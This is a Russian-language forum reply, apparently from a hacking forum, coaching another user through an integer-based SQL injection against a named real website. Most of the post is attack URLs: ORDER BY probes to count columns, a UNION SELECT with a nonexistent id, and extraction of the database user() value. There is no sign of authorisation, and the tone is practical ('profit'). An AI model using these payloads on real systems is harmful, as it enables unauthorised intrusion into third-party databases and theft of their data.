Показать сообщение отдельно

  #2  
Старый 19.10.2015, 12:18
Br@!ns
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
Провел на форуме:
179197

Репутация: 25


По умолчанию

Цитата:
Сообщение от aldemko  

подскажите что не так делаю ?
В вашем примере кавычка не нужна, у вас другой тип уязвимости, Integer.

http://herorace.ru/news-full.php?id=1+order+by+1+--+ - TRUE

http://herorace.ru/news-full.php?id=1+order+by+7+--+ - FALSE

http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+ - TRUE

Далее изменим id=1 на несуществующее значение, что бы убрать текст и вывести нужные нам данные

http://herorace.ru/news-full.php?id=...,2,3,4,5,6+--+

профит

http://herorace.ru/news-full.php?id=...4,user(),6+--+

не останавливайтесь на прочтении статьи, комментарии тоже полезные там есть
 
Ответить с цитированием